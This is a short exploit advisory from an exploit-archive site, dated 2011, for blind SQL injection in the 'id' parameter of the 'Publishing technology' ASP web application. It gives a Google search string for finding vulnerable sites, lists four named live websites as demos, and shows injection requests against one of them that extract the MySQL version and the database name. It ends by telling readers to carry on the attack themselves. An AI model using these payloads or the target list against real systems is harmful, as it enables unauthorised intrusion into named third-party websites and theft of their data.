Publishing technology <= BLIND SQL Injection Vulnerabilities

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+] Author : KnocKout

[~] Contact : knockoutr@msn.com

[~] HomePage : http://h4x0resec.blogspot.com - http://griadamlar.com - 1337day.com

[~] Reference : http://h4x0resec.blogspot.com

~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~

|~Web App. : Publishing technology

|~Price : N/A

|~Version : N/A

|~Software: www.publishingtechnology.com

|~Vulnerability Style : SQL Injection

|~Vulnerability Dir : /

|~Google Keyword : "Powered by Publishing technology AS"

|[~]Date : "24.04.2011"

|[~]Tested on :

Web Server:     Microsoft-IIS/6.0

Powered-by:     ASP.NET

DB Server:      MySQL >=5

----------------------------------------------------------

Details.asp in 'id' Functions Not Security

CollectionContent.asp 'id' Functions Not Security

 

-- Demos.

http://www.la4o.net/Details.asp?id=4

http://www.studiemotet.no/details.asp?id=120

http://www.lesliedowney.no/CollectionContent.asp?id=24

http://lesliedowney.no/CollectionContent.asp?id=24

~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============================================================

    |{~~~~~~~~ Explotation| Blind SQL Injection~~~~~~~~~~~}|

     

    Example

     

    Mysql Version?

    SQL Injecting : http://www.lesliedowney.no/CollectionContent.asp?id=24 and substring(@@version,1,1)=4  {FALSE}

    SQL Injecting Retry : http://www.lesliedowney.no/CollectionContent.asp?id=24 and substring(@@version,1,1)=5 {TRUE}

     

    Database name?

    SQL Injecting : http://www.lesliedowney.no/CollectionContent.asp?id=24 and lenght((database()))<=6 and 'Inj3ct0r'='Inj3ct0r'

    Mysql Writes : [MySQL][ODBC 3.51 Driver][mysqld-5.0.17]FUNCTION leslie.lenght does not exist

    Database Name Found! : "leslie"

    

    

    the rest is up to you exploit.

     

    ================================================================